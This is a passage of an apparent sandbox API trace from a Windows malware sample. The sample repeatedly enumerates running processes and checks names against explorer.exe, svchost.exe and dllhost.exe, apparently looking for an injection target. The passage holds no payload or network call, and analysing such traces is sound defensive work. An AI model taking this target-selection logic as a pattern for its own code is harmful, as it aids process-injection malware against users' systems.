th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0200.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0200.768] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.768] CloseHandle (hObject=0xd8) returned 1 [0200.768] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0200.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0200.768] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.768] CloseHandle (hObject=0xd8) returned 1 [0200.768] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0200.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0200.769] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.769] CloseHandle (hObject=0xd8) returned 1 [0200.769] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0200.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0200.770] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.770] CloseHandle (hObject=0xd8) returned 1 [0200.770] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0200.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0200.770] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.770] CloseHandle (hObject=0xd8) returned 1 [0200.770] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0200.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0200.771] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.771] CloseHandle (hObject=0xd8) returned 1 [0200.771] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0200.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0200.771] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.771] CloseHandle (hObject=0xd8) returned 1 [0200.771] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0200.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0200.772] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.772] CloseHandle (hObject=0xd8) returned 1 [0200.772] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0200.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0200.772] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.772] CloseHandle (hObject=0xd8) returned 1 [0200.773] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0200.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0200.773] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.773] CloseHandle (hObject=0xd8) returned 1 [0200.773] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0200.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0200.774] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.774] CloseHandle (hObject=0xd8) returned 1 [0200.774] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0200.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0200.774] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.774] CloseHandle (hObject=0xd8) returned 1 [0200.774] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0200.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0200.775] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.775] CloseHandle (hObject=0xd8) returned 1 [0200.775] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0200.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0200.775] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.775] CloseHandle (hObject=0xd8) returned 1 [0200.775] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0200.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0200.776] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.776] CloseHandle (hObject=0xd8) returned 1 [0200.776] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0200.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0200.777] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.777] CloseHandle (hObject=0xd8) returned 1 [0200.777] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0200.777] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0200.778] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0200.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0200.778] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0200.779] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0200.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0200.779] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0200.780] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0200.780] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.780] CloseHandle (hObject=0xd8) returned 1 [0200.780] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0200.780] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0200.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0200.781] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.781] CloseHandle (hObject=0xd8) returned 1 [0200.781] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0200.781] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0200.781] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0200.781] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0200.781] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0200.782] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.782] CloseHandle (hObject=0xd8) returned 1 [0200.782] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0200.783] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.783] CloseHandle (hObject=0xd8) returned 1 [0200.783] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0200.783] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0200.783] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.783] CloseHandle (hObject=0xd8) returned 1 [0200.783] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.784] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0200.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0200.784] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.784] CloseHandle (hObject=0xd8) returned 1 [0200.784] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0200.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0200.828] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0200.828] CloseHandle (hObject=0xd4) returned 1 [0200.828] Sleep (dwMilliseconds=0x3e8) [0201.871] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0201.873] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0201.874] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0201.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0201.874] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0201.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0201.875] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0201.875] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0201.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0201.876] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0201.876] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0201.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0201.877] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0201.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0201.877] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0201.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0201.878] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0201.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0201.878] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0201.879] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0201.879] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0201.880] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0201.880] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0201.881] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0201.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0201.881] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0201.882] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0201.882] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0201.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0201.883] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.883] CloseHandle (hObject=0xd8) returned 1 [0201.883] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0201.883] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0201.883] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0201.883] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0201.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0201.884] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0201.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0201.884] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0201.884] CloseHandle (hObject=0xd8) returned 1 [0201.884] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0201.884] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0201.884] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0201.884] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, 